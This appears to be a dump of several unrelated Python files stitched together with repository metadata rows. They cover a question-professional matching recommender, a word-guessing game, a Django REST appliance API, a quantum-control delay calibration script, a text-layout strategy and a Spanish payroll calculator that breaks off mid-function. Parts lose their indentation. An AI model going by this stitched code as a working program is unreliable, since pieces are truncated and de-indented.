        lat_vecs = self.que_model.predict(que_feat)
        return lat_vecs
    def __get_pro_latent(self, pro_df: pd.DataFrame, que_df: pd.DataFrame, ans_df: pd.DataFrame,
                         pro_tags: pd.DataFrame) -> np.ndarray:
        """
        Get latent vectors for professionals in raw format.

        Note: mutates the input dataframes in place (date columns parsed
        to datetime).
        """
        pro_df['professionals_date_joined'] = pd.to_datetime(pro_df['professionals_date_joined'])
        que_df['questions_date_added'] = pd.to_datetime(que_df['questions_date_added'])
        ans_df['answers_date_added'] = pd.to_datetime(ans_df['answers_date_added'])
        # extract and preprocess professional's features
        pro_feat = self.pro_proc.transform(pro_df, que_df, ans_df, pro_tags)
        # select the last available version of professional's features
        # (one row per professionals_id), dropping the leading column
        pro_feat = pro_feat.groupby('professionals_id').last().values[:, 1:]
        # encode professional's data to get latent representation
        lat_vecs = self.pro_model.predict(pro_feat)
        return lat_vecs
    def __construct_df(self, ids, sims, scores):
        """
        Assemble an (id, match_id, match_score) DataFrame from KD-tree query
        results, skipping matches already paired with the entity.

        NOTE(review): `sim[0]` assumes each element of `sims[i]` is itself
        indexable (e.g. an id wrapped in an array) -- confirm the dtype of
        the stored id arrays.
        """
        scores = np.round(scores, 4)
        tuples = []
        for i, cur_id in enumerate(ids):
            for j, sim in enumerate(sims[i]):
                # Drop pairs recorded in entity_to_paired (presumably
                # already-existing question/professional pairs).
                if sim[0] not in self.entity_to_paired.get(cur_id, {}):
                    tuples.append((cur_id, sim[0], scores[i, j]))
        score_df = pd.DataFrame(tuples, columns=['id', 'match_id', 'match_score'])
        return score_df
    def __get_ques_by_latent(self, ids: np.ndarray, lat_vecs: np.ndarray, top: int) -> pd.DataFrame:
        """
        Get top questions with most similar latent representations to given vectors.
        """
        dists, ques = self.que_tree.query(lat_vecs, k=top)
        # Map KD-tree row indices back to question ids.
        ques = self.que_ids[ques]
        # Turn distances into similarity scores in (0, 1]: exp(-distance).
        scores = np.exp(-dists)
        return self.__construct_df(ids, ques, scores)
    def __get_pros_by_latent(self, ids: np.ndarray, lat_vecs: np.ndarray, top: int) -> pd.DataFrame:
        """
        Get top professionals with most similar latent representations to given vectors.
        """
        dists, pros = self.pro_tree.query(lat_vecs, k=top)
        # Map KD-tree row indices back to professional ids.
        pros = self.pro_ids[pros]
        # Turn distances into similarity scores in (0, 1]: exp(-distance).
        scores = np.exp(-dists)
        return self.__construct_df(ids, pros, scores)
    def find_pros_by_que(self, que_df: pd.DataFrame, que_tags: pd.DataFrame, top: int = 10) -> pd.DataFrame:
        """
        Get top professionals with most similar internal representation to given questions.

        Note: *que_df* is mutated in place (date column parsed to datetime).

        :param que_df: question's data in raw format
        :param que_tags: questions's tags in raw format
        :param top: number of professionals for each question to return
        :return: dataframe of question's ids, matched professional's ids and similarity scores
        """
        lat_vecs = self.__get_que_latent(que_df, que_tags)
        return self.__get_pros_by_latent(que_df['questions_id'].values, lat_vecs, top)
def find_ques_by_que(self, que_df: pd.DataFrame, que_tags: pd.DataFrame, top: int = 5) -> pd.DataFrame:
"""
Get top questions with most similar internal representation to given questions
:param que_df: question's data in raw format
:param que_tags: questions's tags in raw format
:param top: number of questions for each question to return
:return: dataframe of question's ids, matched question's ids and similarity scores
"""
lat_vecs = self.__get_que_latent(que_df, que_tags)
print('in : ',psutil.Process(os.getpid()).memory_info().rss)
return self.__get_ques_by_latent(que_df['questions_id'].values, lat_vecs, top)
def find_ques_by_pro(self, pro_df: pd.DataFrame, que_df: pd.DataFrame, ans_df: pd.DataFrame,
pro_tags: pd.DataFrame, top: int = 10) -> pd.DataFrame:
"""
Get top questions with most similar internal representation to given professional
:param pro_df: professional's data in raw format
:param que_df: question's data in raw format
:param ans_df: answer's data in raw format
:param pro_tags: professional's tags data in raw format
:param top: number of questions for each professional to return
:return: dataframe of professional's ids, matched question's ids and similarity scores
"""
lat_vecs = self.__get_pro_latent(pro_df, que_df, ans_df, pro_tags)
print('in : ',psutil.Process(os.getpid()).memory_info().rss)
return self.__get_ques_by_latent(pro_df['professionals_id'].values, lat_vecs, top)
def find_pros_by_pro(self, pro_df: pd.DataFrame, que_df: pd.DataFrame, ans_df: pd.DataFrame,
pro_tags: pd.DataFrame, top: int = 10) -> pd.DataFrame:
"""
Get top professionals with most similar internal representation to given professional
:param pro_df: professional's data in raw format
:param que_df: question's data in raw format
:param ans_df: answer's data in raw format
:param pro_tags: professional's tags data in raw format
:param top: number of questions for each professional to return
:return: dataframe of professional's ids, matched professional's ids and similarity scores
"""
lat_vecs = self.__get_pro_latent(pro_df, que_df, ans_df, pro_tags)
return self.__get_pros_by_latent(pro_df['professionals_id'].values, lat_vecs, top)
class Formatter:
"""
Class with useful for Predictor input/output functionality
"""
def __init__(self, data_path: str):
pro = pd.read_csv(os.path.join(data_path, 'professionals.csv'))
que = pd.read_csv(os.path.join(data_path, 'questions.csv'))
tags = pd.read_csv(os.path.join(data_path, 'tags.csv'))
tag_users = pd.read_csv(os.path.join(data_path, 'tag_users.csv'))
tag_que = pd.read_csv(os.path.join(data_path, 'tag_questions.csv'))
tag_merged = tags.merge(tag_users, left_on='tags_tag_id', right_on='tag_users_tag_id')
tags_grouped = tag_merged.groupby('tag_users_user_id').agg(lambda x: ' '.join(x))[['tags_tag_name']]
self.pro = pro.merge(tags_grouped, left_on='professionals_id', right_index=True, how='left')
tag_merged = tags.merge(tag_que, left_on='tags_tag_id', right_on='tag_questions_tag_id')
tags_grouped = tag_merged.groupby('tag_questions_question_id').agg(lambda x: ' '.join(x))[['tags_tag_name']]
self.que = que.merge(tags_grouped, left_on='questions_id', right_index=True, how='left')
def get_que(self, scores: pd.DataFrame) -> pd.DataFrame:
"""
Append all the question's data to question's scoring dataframe from Predictor
:param scores: result of similar questions query on Predictor object
:return: extended dataframe
"""
return self.que.merge(scores, left_on='questions_id', right_on='match_id').sort_values('match_score',
ascending=False)
def get_pro(self, scores: pd.DataFrame) -> pd.DataFrame:
"""
Append all the professional's data to professional's scoring dataframe from Predictor
:param scores: result of similar professionals query on Predictor object
:return: extended dataframe
"""
return self.pro.merge(scores, left_on='professionals_id', right_on='match_id').sort_values('match_score',
ascending=False)
@staticmethod
def __convert_tuples(ids, tags):
tuples = []
for i, tgs in enumerate(tags):
que = ids[i]
for tag in tgs.split(' '):
tuples.append((que, tag))
return tuples
@staticmethod
def convert_que_dict(que_dict: dict) -> (pd.DataFrame, pd.DataFrame):
"""
Converts dictionary of question data into desired form
:param que_dict: dictionary of question data
"""
# get DataFrame from dict
que_df = pd.DataFrame.from_dict(que_dict)
# create question-tag tuples
tuples = Formatter.__convert_tuples(que_df['questions_id'].values, que_df['questions_tags'].values)
# create DataFrame from tuples
que_tags = pd.DataFrame(tuples, columns=['tag_questions_question_id', 'tags_tag_name'])
que_df.drop(columns='questions_tags', inplace=True)
que_tags['tags_tag_name'] = que_tags['tags_tag_name'].apply(lambda x: tp.process(x, allow_stopwords=True))
que_df['questions_title'] = que_df['questions_title'].apply(tp.process)
que_df['questions_body'] = que_df['questions_body'].apply(tp.process)
que_df['questions_whole'] = que_df['questions_title'] + ' ' + que_df['questions_body']
return que_df, que_tags
@staticmethod
def convert_pro_dict(pro_dict: dict) -> (pd.DataFrame, pd.DataFrame):
"""
Converts dictionary of professional data into desired form
:param pro_dict: dictionary of professional data
"""
# get DataFrame from dict
pro_df = pd.DataFrame.from_dict(pro_dict)
pros = pro_df['professionals_id'].values
# create professional-tag tuples
tuples = Formatter.__convert_tuples(pro_df['professionals_id'].values,
pro_df['professionals_subscribed_tags'].values)
# create DataFrame from tuples
pro_tags = pd.DataFrame(tuples, columns=['tag_users_user_id', 'tags_tag_name'])
pro_df.drop(columns='professionals_subscribed_tags', inplace=True)
pro_tags['tags_tag_name'] = pro_tags['tags_tag_name'].apply(lambda x: tp.process(x, allow_stopwords=True))
pro_df['professionals_headline'] = pro_df['professionals_headline'].apply(tp.process)
pro_df['professionals_industry'] = pro_df['professionals_industry'].apply(tp.process)
return pro_df, pro_tags | [
"fy_zadi@esi.dz"
] | fy_zadi@esi.dz |
9915b01a6a3ab3093a9f6fb7167c27b84ddebc0b | 938e618517113016d10aa401a987a58f445bdf84 | /game.py | 17dab103dd140660efeb1473e579440aa621414a | [] | no_license | divyeshbalar/PythonWordGame | 8081a2aea998403129efd7a8d85579ee4ca52fa1 | c3f7214b770460b15b444b0acc36c294841c19cd | refs/heads/master | 2020-05-24T18:03:39.971339 | 2019-06-07T19:07:40 | 2019-06-07T19:07:40 | 187,401,415 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,465 | py | import math
import random
import PythonWordGame.stringDb as stringDb
class game:
"""
@author: Divyeshkumar Balar(40062267)
Class game is main blueprint of game data structure;
which includes a static list with the frequency of each character.
It also include helper methods
"""
wordFrequency = {
'E': 12.02,
'T': 9.10,
'A': 8.12,
'O': 7.68,
'I': 7.31,
'N': 6.95,
'S': 6.28,
'R': 6.02,
'H': 5.92,
'D': 4.32,
'L': 3.98,
'U': 2.88,
'C': 2.71,
'M': 2.61,
'F': 2.30,
'Y': 2.11,
'W': 2.09,
'G': 2.03,
'P': 1.82,
'B': 1.49,
'V': 1.11,
'K': 0.69,
'X': 0.17,
'Q': 0.11,
'J': 0.10,
'Z': 0.07
}
def __init__(self):
s1 = stringDb.stringDb()
self.word = s1.getRandomWord()
self.status = 0 #0 for giveup and 1 for success
self.noOfBadGuess = 0
self.currentGuess = '----'
self.score = 0
self.baseScore = self.getBaseScoreOfWord()
def getScore(self):
"""
It returns the current score
"""
return self.score
def getHintChar(self):
"""
This method returns the random hint character out of 4 leter word
and deduct the relevent score from total;
deduction of score is done by other method.
"""
randVar = random.choice(range(0,4,1))
tempChar = self.word[randVar]
while self.isCurrentGuessContains(tempChar):
randVar = random.choice(range(4))
tempChar= self.word[randVar]
k = 0
tempStr= ''
for i in self.currentGuess:
if(k == randVar or self.word[k] == self.word[randVar]):
tempStr+=tempChar
else:
tempStr+=i
k+=1
self.currentGuess = tempStr
if(self.currentGuess == self.word):
print("Guess a 4 letter word: ", self.currentGuess)
self.scoreDownForChar(tempChar)
return tempChar
def isCorrectWord(self, tempWord):
"""
This method will return true/false depending on given word
from user matches to the current word.
It also call methods to increase or deduct the score accordingly.
"""
if(tempWord == self.word):
self.getBaseScoreOfWord()
self.score+=10
print("Its not Possible, you are cheating.......... or you are superHuman")
self.status = 1
self.currentGuess = tempWord
return True
else:
print("Try again, better luck next time")
self.deduceScoreForWrongWord()
return False
def isCurrentGameOver(self):
"""
Return true is the current game is over
"""
if self.word == self.currentGuess:
return True
else:
return False
def isCurrentGuessContains(self, tempChar):
"""
This method return True if the passed character is \r
already in currntly guessed string.
Otherwise returns false
"""
for i in self.currentGuess:
if(i == tempChar):
return True
return False
def isCorrectGuess(self, tempChar):
"""
This method returns true
if the character entered by user is correct guess
(means, part of current word)
It also add or deduct the score accordingly
"""
k = 0
flag = False
tempStr = ''
if(self.isCurrentGuessContains(tempChar)):
print("This letter is already guess by you Dumb!!")
self.noOfBadGuess+=1
return False
for i in self.word:
if(i == tempChar):
tempStr += tempChar
self.scoreUpForChar(tempChar)
flag = True
k+=1
else:
tempStr+=self.currentGuess[k]
k+=1
self.currentGuess = tempStr
if(flag == False):
self.noOfBadGuess+=1
self.scoreDownForChar(tempChar)
if(self.currentGuess == self.word):
self.status = 1
return flag
def deduceScoreForWrongWord(self):
"""
This method deduct score when the word entered by
user(Guess by user) is wrong
deducing score for each wrong 'word'(Not Character) guess
if the current current score is zero and
user enter the wrong word
this method will reduce score by base score
if score is not zero than it will reduce 10% of
total basescore from score
"""
if(self.score == 0):
self.score -= self.baseScore
else:
self.score-=self.baseScore*0.10
def getBaseScoreOfWord(self):
"""
This method calculate the base score for
each rnadom word picked from the data set
base score is calculated for word
base score method returns the base score for current word
sum of max (frequency - frquency of each charater)
Hence, 'eeee' got the least score and 'zzzz'
got the highest base score
"""
temp = 0
for i in self.word:
temp+=(float(self.getWordFrequency('E'))-float(self.getWordFrequency(i)))
return float(temp)
def getWordFrequency(self, tempChars):
"""
This method return the probability of given character.
"""
tempChars = tempChars.upper()
return game.wordFrequency.get(tempChars)
def getWordOnDemand(self):
"""
This method returns the whole word,
in case when user giveup and press 'X'
It deduct the score as much as the baseScore of the word
"""
self.currentGuess = self.word
self.score-=self.getBaseScoreOfWord()
self.noOfBadGuess+=1
self.status = 0
return self.currentGuess
#---------------------------------------------Scoring up and down ---------------------------
def scoreDownForChar(self, tempChar):
"""
This method include the logic to decrease the score
when the guessed character is wrong
total score minus (probability of tempchar - max frequency )
for the most frquent character there will be least deduction and
for the least frequent character there is high deduction
"""
tempChar = tempChar.upper()
probOfChar = float(self.getWordFrequency(tempChar))
self.score -= (probOfChar - float(self.getWordFrequency('E')))
def scoreUpForChar(self, tempChar):
"""
total score plus max probability - probability of character
scoring up depends on the frequency of character
the most frequent character will have
least effect on the total score
and the least frequent character will add more value to total
"""
tempChar = tempChar.upper()
probOfChar = float(self.getWordFrequency(tempChar))
self.score = self.score + (float(self.getWordFrequency('E')- probOfChar))
| [
"divyeshkumar_balar@outlook.com"
] | divyeshkumar_balar@outlook.com |
acb5246b57c491991154128c84af2f4c07e2a5d5 | 758c7be672c044613b6ef4d661288150e3e2c960 | /Appliance_app/views.py | 59f3c74e773b09620cbac61faaaf6bfca87f2c39 | [] | no_license | ttovely/Appliance | e637007843045ab6304970ea26e7b7fc2607a564 | dd7a3b8a9b18e7e68129d7b062bc17ccc93244fe | refs/heads/master | 2023-08-02T09:57:53.301698 | 2021-09-29T08:59:18 | 2021-09-29T08:59:18 | 411,601,033 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,538 | py | from .models import Category, Appliances
from .serializers import CategorySerializer, AppliancesSerializer, CommentSerializer
from rest_framework.viewsets import ModelViewSet
from rest_framework.permissions import IsAuthenticated, IsAuthenticatedOrReadOnly
from rest_framework.decorators import action
from rest_framework.response import Response
from rest_framework import serializers, status
from rest_framework.filters import SearchFilter
class CategoryVievSet(ModelViewSet):
queryset = Category.objects.all()
serializer_class = CategorySerializer
permission_classes = [IsAuthenticated, ]
filter_backends = [SearchFilter, ]
search_fields = ['category', ]
@action(methods=['post', ], detail=True, serializer_class = AppliancesSerializer)
def add_appliance(self, request, *args, **kwargs):
category = self.get_object()
serializer = AppliancesSerializer(data=request.data)
if serializer.is_valid():
data = serializer.validated_data
appliance = Appliances.objects.create(
brand=data['brand'],
category=category,
model=data['model'],
price=data['price'],
quantity=data['quantity'],
inStock=data['inStock']
)
appliance.save()
serializer = AppliancesSerializer(instance=appliance)
return Response(serializer.data, status=status.HTTP_200_OK)
else:
return Response(serializer.errors, status= status.HTTP_400_BAD_REQUEST)
class AppliancesViewSet(ModelViewSet):
queryset = Appliances.objects.all()
serializer_class = AppliancesSerializer
permission_classes = [IsAuthenticatedOrReadOnly, ]
filter_backends = [SearchFilter, ]
search_fields = ['brand', 'category__category', 'model']
@action(methods=['post',], detail=True, serializer_class = CommentSerializer)
def add_comment(self, request, *args, **kwargs):
appliances = self.get_object()
serializer = CommentSerializer(data=request.data)
if serializer.is_valid(raise_exception=True):
serializer.save(author = request.user, appliances = appliances)
return Response(serializer.data)
@action(methods=['get', 'post', ], detail=True)
def minus_quantity(self, request, *args, **kwargs):
appliances = self.get_object()
if appliances.quantity > 0:
appliances.quantity -=1
if appliances.quantity ==0:
appliances.inStock = False
appliances.save()
serializer = self.get_serializer_class()(instance=appliances)
return Response(serializer.data)
else:
appliances.save()
appliances = self.get_serializer_class()(instance=appliances)
return Response(appliances.data)
else:
return Response({'Error': 'quantity is zero'})
@action(methods=['get', ], detail=True)
def add_quantity(self, request, *args, **kwargs):
appliances = self.get_object()
appliances.quantity +=1
appliances.inStock = True
appliances.save()
serializer = self.get_serializer_class()(instance=appliances)
return Response(serializer.data)
| [
"bagievavttovely@gmail.com"
] | bagievavttovely@gmail.com |
f047ba14d4aa661c9fc681be9b3cea0e8dbdbc32 | 263c79fd1d8541f0cf0b5dd9ed1c5e8acd463556 | /Quantum-Control-Applications/Optically addressable spin qubits/Cryogenic nanophotonic cavity/calibrate_delays.py | 72d431fb6ccdd22f4a7fc2968c16a840c0982136 | [
"BSD-3-Clause"
] | permissive | qua-platform/qua-libs | d929681da67fa4e88e96d0f96eef19034146a039 | 245bdeb625e2e64005962a02dcb58d3441e6afc6 | refs/heads/main | 2023-09-01T06:04:57.665500 | 2023-08-29T15:01:47 | 2023-08-29T15:01:47 | 293,225,951 | 45 | 13 | BSD-3-Clause | 2023-09-05T08:09:32 | 2020-09-06T07:29:42 | Python | UTF-8 | Python | false | false | 3,459 | py | """
calibrate_delays.py: Plays a MW pulse during a laser pulse, while performing time tagging throughout the sequence.
This allows measuring all the delays in the system, as well as the NV initialization duration.
If the counts are too high, the program might hang. In this case reduce the resolution or use
calibrate_delays_python_histogram.py if high resolution is needed.
"""
from qm.QuantumMachinesManager import QuantumMachinesManager
from qm.qua import *
from qm import SimulationConfig
import matplotlib.pyplot as plt
from configuration import *
###################
# The QUA program #
###################
initial_delay_cycles = 500 // 4 # delay before laser (units of clock cycles = 4 ns)
laser_len_cycles = 2000 // 4 # laser duration length (units of clock cycles = 4 ns)
mw_len_cycles = 1000 // 4 # MW duration length (units of clock cycles = 4 ns)
wait_between_runs = 3000 // 4 # (4ns)
n_avg = 1e6
resolution = 12 # ns
meas_len = laser_len_cycles * 4 + 1000 # total measurement length (ns)
t_vec = np.arange(0, meas_len, 1)
with program() as calib_delays:
times = declare(int, size=100) # 'size' defines the max number of photons to be counted
times_st = declare_stream() # stream for 'times'
counts = declare(int) # variable to save the total number of photons
i = declare(int) # variable used to save data
n = declare(int) # variable used in for loop for averaging
n_st = declare_stream() # stream for 'iteration'
with for_(n, 0, n < n_avg, n + 1):
wait(initial_delay_cycles, "AOM") # wait before starting PL
play("laser_ON", "AOM", duration=laser_len_cycles)
wait(initial_delay_cycles + (laser_len_cycles - mw_len_cycles) // 2, "Yb") # delay the microwave pulse
play("cw", "Yb", duration=mw_len_cycles) # play microwave pulse
measure("readout", "SNSPD", None, time_tagging.analog(times, meas_len, counts))
wait(wait_between_runs, "SNSPD")
with for_(i, 0, i < counts, i + 1):
save(times[i], times_st) # save time tags to stream
save(n, n_st) # save number of iteration inside for_loop
with stream_processing():
times_st.histogram([[i, i + (resolution - 1)] for i in range(0, meas_len, resolution)]).save("times_hist")
n_st.save("iteration")
#####################################
# Open Communication with the QOP #
#####################################
qmm = QuantumMachinesManager(qop_ip)
simulate = True
if simulate:
simulation_config = SimulationConfig(duration=28000)
job = qmm.simulate(config, calib_delays, simulation_config)
job.get_simulated_samples().con1.plot()
else:
qm = qmm.open_qm(config)
job = qm.execute(calib_delays)
# Get results from QUA program
results = fetching_tool(job, data_list=["times_hist", "iteration"], mode="live")
# Live plotting
fig = plt.figure()
interrupt_on_close(fig, job) # Interrupts the job when closing the figure
while results.is_processing():
# Fetch results
times_hist, iteration = results.fetch_all()
# Progress bar
progress_counter(iteration, n_avg, start_time=results.get_start_time())
# Plot data
plt.cla()
plt.plot(t_vec[::resolution] + resolution / 2, times_hist / 1000 / (resolution / u.s) / iteration)
plt.xlabel("t [ns]")
plt.ylabel(f"counts [kcps / {resolution}ns]")
plt.title("Delays")
plt.pause(0.1)
| [
"noreply@github.com"
] | qua-platform.noreply@github.com |
c6e82994fe46b9592e04334480b1f29f27c8139e | 6aa6fbb3f3d971d3a0217b94c9a8e26a417f6758 | /core/layout/strategy/HorizontalStrategy.py | acbeafc94a31908cd085e6d1154f9aa0192464d4 | [
"MIT"
] | permissive | BboyHanat/TextGenerator | 25a52e484331d84328ea3620b0973d0ba9c4eb5d | 7e4ec737fbf4f6031d0c28a2c0f6cff662792a76 | refs/heads/master | 2022-03-27T11:58:15.940730 | 2022-03-01T06:32:09 | 2022-03-01T06:32:09 | 209,213,635 | 187 | 53 | null | 2020-05-13T06:56:29 | 2019-09-18T03:58:09 | Python | UTF-8 | Python | false | false | 661 | py | from core.layout.strategy import Strategy
class HorizontalStrategy(Strategy):
"""
只生成一个水平排布的文本贴图布局
"""
def logic(self, block_group, next_block) -> bool:
init_x = block_group.group_box[0]
init_y = block_group.group_box[1]
next_x = init_x
next_y = init_y
for block in block_group.block_list:
r = block.outer_box[2]
if r > next_x:
next_x = r
next_x += 1
next_block.locate_by_outter(next_x, next_y)
if self.check_is_out(block_group=block_group, block=next_block):
return False
return True
| [
"lijianan@tezign.com"
] | lijianan@tezign.com |
a3a700cace9dcfd1645f568a0f67b220c0a09d47 | 02c6202622850be6ca2a4d088cd8b6005d3bc8a1 | /nomina_helper_processor.py | 0c5f16b7d586291ff50912301ebaa71a5bc6f6de | [] | no_license | danielcelin/nomina_helper | 65fd0423fdff5f2591713b7895fc1b19fa56d768 | 5eaa5fb2bfe902a77876467f05188c5d8d6fc05c | refs/heads/master | 2021-01-22T10:15:04.069029 | 2015-11-12T15:56:14 | 2015-11-12T15:56:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,639 | py | """
NominaHelper v3.0
Programa para calcular la nomina de una empresa. Lee los nombres y salarios desde un archivo de texto
que se suministra como argumento de linea de comandos, por ejemplo, nombres.txt. Al final guarda la liquidacion
en el archivo liquidacion.txt, el registro de errores en errores.txt y el registro de operacion en log.txt.
A partir de la version 3, Nomina Helper es el nuevo nombre, cambia de EasyNomina. Tambien a partir de esta version
el programa cuenta con interfaz grafica de usuario (GUI) desarrollada en PyQt4.
Desarrollado por Juan Sebastian Lopez Villa
Octubre 15 de 2015
Valores de porcentajes para liquidacion de nomina tomados de http://www.gerencie.com/liquidacion-de-la-nomina.html.
"""
# Importar libreria sys para manejo de argumentos de linea de comandos
import sys
# Importar las clases del modelo de NominaHelper.
from modelo.nomina import *
from utils.log_utils import *
class NominaHelperProcessor:
def __init__(self, configuracion_nomina):
self.configuracion_nomina = configuracion_nomina
self.log_utils = LogUtils(self.configuracion_nomina.nombre_archivo_errores,
self.configuracion_nomina.nombre_archivo_registro)
def validar_linea(self, linea_por_validar, numero_linea):
array_respuesta = [0 for x in range(3)]
# Separar la linea por el simbolo (token) *
arreglo_campos = linea_por_validar.split("*")
# Validar la estructura de cada linea.
# Validacion 4 (Va4)
if len(arreglo_campos) != 2:
self.log_utils.guardar_error("La linea " + str(numero_linea) + " no cumple con la estructura requerida! Revisarla!")
array_respuesta[0] = False
return array_respuesta
nombre_por_validar = arreglo_campos[0]
arreglo_nombre = nombre_por_validar.split(" ")
# Validar el numero de palabras del nombre
# Validacion 5 (Va5)
if len(arreglo_nombre) < 2 or len(arreglo_nombre) > 5:
self.log_utils.guardar_error(
"El nombre " + arreglo_campos[0] + " no cumple con la longitud requerida! Revisar linea numero " + str(
numero_linea) + " de archivo de nomina.")
array_respuesta[0] = False
return array_respuesta
array_respuesta[1] = arreglo_nombre
# Validar que el salario sea de tipo numerico
# Validacion 6 (Va6)
try:
salario_base = int(arreglo_campos[1])
array_respuesta[2] = salario_base
except ValueError:
self.log_utils.guardar_error("El valor de salario " + arreglo_campos[
1] + " no puede convertirse a entero! Revisar linea numero " + str(
numero_linea) + " de archivo de nomina.")
array_respuesta[0] = False
return array_respuesta
array_respuesta[0] = True
return array_respuesta
# Funcion que finaliza el programa y guarda el respectivo mensaje de terminacion en el archivo errores.txt
def terminar_programa(self, mensaje_terminacion):
self.log_utils.guardar_error(mensaje_terminacion)
self.log_utils.guardar_log("Programa terminado por error... Verificar archivo errores.txt para mas detalles.")
# Terminar el programa
sys.exit()
def validar_archivo_nomina(self, nombre_archivo_nomina):
if not nombre_archivo_nomina.endswith(".txt"):
self.terminar_programa("El archivo de nomina no tiene extension .txt!")
self.log_utils.guardar_log("Extension de archivo de nomina OK")
# Variable que almacena las lineas del archivo, su contenido como tal.
lineas_archivo_nomina = tuple(self.log_utils.leer_lineas_archivo(nombre_archivo_nomina))
# Variable que almacena el numero de lineas del archivo
numero_lineas_nomina = len(lineas_archivo_nomina)
self.log_utils.guardar_log("Archivo de nomina leido OK")
# Validar que el archivo tenga el minimo numero de lineas.
# Validacion 3 (Va3)
if numero_lineas_nomina < self.configuracion_nomina.numero_minimo_lineas:
self.terminar_programa("El archivo de nomina debe contener como minimo " +
str(self.configuracion_nomina.numero_minimo_lineas) + " lineas!")
def calcular_auxilio_transporte(self, salario_base):
if salario_base <= self.configuracion_nomina.tope_auxilio_transporte:
self.log_utils.guardar_log("Empleado con derecho a auxilio de transporte ...")
return self.configuracion_nomina.auxilio_transporte
else:
return 0
def calcular_fondo_solidaridad(self, salario_base):
if salario_base >= self.configuracion_nomina.tope_fondo_solidaridad:
self.log_utils.guardar_log("Empleado paga fondo solidaridad pensional ...")
return self.configuracion_nomina.porcentaje_fondo_solidaridad * salario_base
else:
return 0
def calcular_seguridad_social(self, salario_base):
# ----- Seguridad Social ----- #
# Porcentaje aporte de salud realizado por la empresa 8.5%
self.log_utils.guardar_log("Calculando aporte salud empresa ...")
aporte_salud_empresa = 0.085 * salario_base
# Porcentaje aporte de salud realizado por la empresa 12%
self.log_utils.guardar_log("Calculando aporte pension empresa ...")
aporte_pension_empresa = 0.12 * salario_base
# Porcentaje aporte de riesgos laborales realizado por la empresa.
self.log_utils.guardar_log("Calculando aporte ARL con porcentaje " +
("%.3f" % self.configuracion_nomina.porcentaje_arl) + " ...")
aporte_arl_empresa = self.configuracion_nomina.porcentaje_arl * salario_base
return SeguridadSocial(aporte_salud_empresa, aporte_pension_empresa, aporte_arl_empresa)
def calcular_aportes_parafiscales(self, salario_base):
# ----- Aportes Parafiscales ----- #
# Porcentaje aporte parafiscal para SENA realizado por la empresa 2%
self.log_utils.guardar_log("Calculando aporte parafiscales sena ...")
aporte_parafiscales_sena = 0.02 * salario_base
# Porcentaje aporte parafiscal para ICBF realizado por la empresa 3%
self.log_utils.guardar_log("Calculando aporte parafiscales ICBF ...")
aporte_parafiscales_icbf = 0.03 * salario_base
# Porcentaje aporte parafiscal para Cajas de Compensacion realizado por la empresa 4%
self.log_utils.guardar_log("Calculando aporte parafiscales cajas de compensacion ...")
aporte_parafiscales_cajas = 0.04 * salario_base
return AporteParafiscal(aporte_parafiscales_sena, aporte_parafiscales_icbf, aporte_parafiscales_cajas)
def calcular_prestaciones_sociales(self, salario_base, auxilio_transporte_efectivo):
# ----- Prestaciones Sociales ----- #
# Porcentaje aporte cesantias realizado por la empresa 8.33%. Se debe tener en cuenta el auxilio de transporte.
self.log_utils.guardar_log("Calculando aporte cesantias ...")
aporte_cesantias = 0.0833 * (salario_base + auxilio_transporte_efectivo)
# Porcentaje aporte intereses sobre cesantias realizado por la empresa 1%
self.log_utils.guardar_log("Calculando aporte intereses sobre cesantias ...")
aporte_intereses_cesantias = 0.01 * aporte_cesantias
# Porcentaje aporte prima de servicios realizado por la empresa 8.33%.
# Se debe tener en cuenta el auxilio de transporte.
self.log_utils.guardar_log("Calculando aporte prima de servicios ...")
aporte_prima = 0.0833 * (salario_base + auxilio_transporte_efectivo)
# Porcentaje aporte vacaciones realizado por la empresa 4.17%
self.log_utils.guardar_log("Calculando aporte vacaciones ...")
aporte_vacaciones = 0.0833 * salario_base
return PrestacionSocial(aporte_cesantias, aporte_intereses_cesantias, aporte_prima, aporte_vacaciones)
def calcular_apropiaciones(self, salario_base, auxilio_transporte_efectivo):
seguridad_social = self.calcular_seguridad_social(salario_base)
aportes_parafiscales = self.calcular_aportes_parafiscales(salario_base)
prestaciones_sociales = self.calcular_prestaciones_sociales(salario_base, auxilio_transporte_efectivo)
return Apropiacion(seguridad_social, aportes_parafiscales, prestaciones_sociales)
def calcular_deducciones(self, salario_base):
# Porcentaje aporte de salud realizado por el empleado 4%
self.log_utils.guardar_log("Calculando aporte salud empleado ...")
aporte_salud_empleado = 0.04 * salario_base
self.log_utils.guardar_log("Calculando aporte fondo de solidaridad pensional ...")
aporte_fondo_solidaridad = self.calcular_fondo_solidaridad(salario_base)
# Porcentaje aporte de salud realizado por el empleado 4%
self.log_utils.guardar_log("Calculando aporte pension empleado ...")
aporte_pension_empleado = 0.04 * salario_base
return Deduccion(aporte_salud_empleado, aporte_pension_empleado, aporte_fondo_solidaridad)
def calcular_nomina(self, empleado):
auxilio_transporte_efectivo = self.calcular_auxilio_transporte(empleado.salario)
apropiaciones = self.calcular_apropiaciones(empleado.salario, auxilio_transporte_efectivo)
deducciones = self.calcular_deducciones(empleado.salario)
return NominaEmpleado(apropiaciones,deducciones, auxilio_transporte_efectivo)
def guardar_liquidacion_nomina(self, liquidaciones_empleados, nombre_archivo_liquidacion):
self.log_utils.guardar_log("Creando archivo " + nombre_archivo_liquidacion + " ...")
self.log_utils.crear_archivo(nombre_archivo_liquidacion)
# Ciclo 3 para guardar liquidacion en archivo liquidacion.txt.
self.log_utils.guardar_log("Guardando liquidacion...")
for liquidacion_empleado in liquidaciones_empleados:
contenido_linea = (
liquidacion_empleado.empleado.id, # Id empleado
liquidacion_empleado.empleado.nombre, # Nombre empleado
liquidacion_empleado.empleado.cargo, # Cargo empleado
int(liquidacion_empleado.empleado.salario), # Salario base
liquidacion_empleado.nomina_empleado.valor_auxilio_transporte, # Aporte auxilio de transporte efectivo.
liquidacion_empleado.nomina_empleado.apropiacion.prestacion_social.cesantias, # Aporte cesantias
liquidacion_empleado.nomina_empleado.apropiacion.prestacion_social.interes_cesantias, # Aporte intereses sobre cesantias
liquidacion_empleado.nomina_empleado.apropiacion.prestacion_social.prima_servicios, # Aporte prima
liquidacion_empleado.nomina_empleado.apropiacion.prestacion_social.vacaciones, # Aporte vacaciones
liquidacion_empleado.nomina_empleado.apropiacion.seguridad_social.arl, # Aporte arl
liquidacion_empleado.nomina_empleado.apropiacion.seguridad_social.salud_empresa, # Aporte salud empresa
